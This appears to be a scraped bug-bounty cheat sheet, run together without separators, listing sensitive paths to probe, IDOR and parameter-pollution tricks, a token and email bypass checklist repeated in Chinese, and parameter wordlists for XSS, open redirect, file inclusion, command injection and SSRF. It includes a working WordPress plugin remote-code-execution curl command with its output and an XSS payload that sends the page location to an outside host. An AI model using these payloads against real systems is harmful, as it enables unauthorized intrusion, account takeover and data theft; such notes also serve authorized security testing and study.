/.git/HEAD/.git/logs/HEAD/.import//.bashrc/admin-cgi/admin-console/backup//console//console/login/h2console/cgi-bin/admin.cgi/jmx-console//portal//portal/login/syslog//web-console

{“id”:111}⟶ 401 Unauthorized{“id”:{“id”:111}} ⟶ 200 OKPOST /api/get_profileContent-Type: application/json {“user_id”:<attacker_id>,”user_id”:<victim’s_id>}GET /api_v1/messages?user_id=VICTIM_ID ⟶ 401GET /api_v1/messages?user_id=VICTIM_ID ⟶ 401GET /api_v1/messages?user_id=attack&user_id=VICTIM ⟶ 200 OK

User:XXX First Name Last NameUser:XXX Firstname LastnameUser:XXX Full NameUser:XXX Fullname

1- Completely remove the token2- change it to 00000000...3- use null/nil value4- try expired token5- try an array of old tokens6- look for race conditions7- change 1 char at the begin/end to see if the token is evaluated8- use unicode char jutzu to spoof email address9- try victim@email.com&attacker@email.com use  %20 or | as separators10- try to register the same mail with different TLD (.eu,.net etc)11- don't add the domain locu@12- try sqli bypass and wildcard or, %, *13- request smuggler?14 - change request method (get, put, post etc) and/or content type (xml<>json) 15- match bad response and replace with good one16- use super long string17-Send a massive token18- Send null fields 19-Send a -*-*-*--""---*-*;*;*-*--*-*;*;*-*-*+;**;;*+*+*!*!*+*++*;*;*+*+*+*++*;

1-完全删除令牌2-将其更改为00000000。。。3-使用空/空值4-试用过期令牌5-尝试一组旧令牌6-试试条件竞争7-在开始/结束处更改1个字符，以查看是否对标记进行了评估8-使用unicode字符juzi欺骗电子邮件地址9-尝试victim@email.com&amp;attacker@email.com使用%20或|作为分隔符10-尝试用不同的TLD（.eu、.net等）注册同一邮件11-不添加域@12-尝试sqli旁路和通配符或，%*13-请求走私者？14-更改请求方法（get、put、post等）和/或内容类型（xml<>json）15-匹配不良响应并替换为良好响应16-使用超长字符串17发送大量token18-发送空字段19发送-*-*-*-*-“”-*-*-*；*；*-*-*-*-*；*；*-*-*+；***；；*+*+*！*！*+*++*++*；*；*+*+*++*++*；

$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click

?q={payload}?s={payload}?search={payload}?id={payload}?lang={payload}?keyword={payload}?query={payload}?page={payload}?keywords={payload}?year={payload}?view={payload}?email={payload}?type={payload}?name={payload}?p={payload}?month={payload}?image={payload}?list_type={payload}?url={payload}?terms={payload}?categoryid={payload}?key={payload}?login={payload}?begindate={payload}?enddate={payload}

?dest={target}?redirect={target}?uri={target}?path={target}?continue={target}?url={target}?window={target}?next={target}?data={target}?reference={target}?site={target}?html={target}?val={target}?validate={target}?domain={target}?callback={target}?return={target}?page={target}?feed={target}?host={target}?port={target}?to={target}?out={target}?view={target}?dir={target}

?cat={payload}?dir={payload}?action={payload}?board={payload}?date={payload}?detail={payload}?file={payload}?download={payload}?path={payload}?folder={payload}?prefix={payload}?include={payload}?page={payload}?inc={payload}?locate={payload}?show={payload}?doc={payload}?site={payload}?type={payload}?view={payload}?content={payload}?document={payload}?layout={payload}?mod={payload}?conf={payload}

?id=?page=?dir=?search=?category=?file=?class=?url=?news=?item=?menu=?lang=?name=?ref=?title=?view=?topic=?thread=?type=?date=?form=?join=?main=?nav=?region=

?cmd=?exec=?command=?execute=?ping=?query=?jump=?code=?reg=?do=?func=?arg=?option=?load=?process=?step=?read=?function=?req=?feature=?exe=?module=?payload=?run=?print=

?next={payload}?url={payload}?target={payload}?rurl={payload}?dest={payload}?destination={payload}?redir={payload}?redirect_uri={payload}?redirect_url={payload}?redirect={payload}/redirect/{payload}/cgi-bin/redirect.cgi?{payload}/out/{payload}/out?{payload}?view={payload}/login?to={payload}?image_url={payload}?go={payload}?return={payload}?returnTo={payload}?return_to={payload}?checkout_url={payload}?continue={payload}?return_path={payload}

🔹 email=victim&email=attacker🔹 email[]=victim&email[]=attacker🔹 email=victim,attacker🔹 {email: victim, email:attacker}🔹 {email: [victim,attacker]}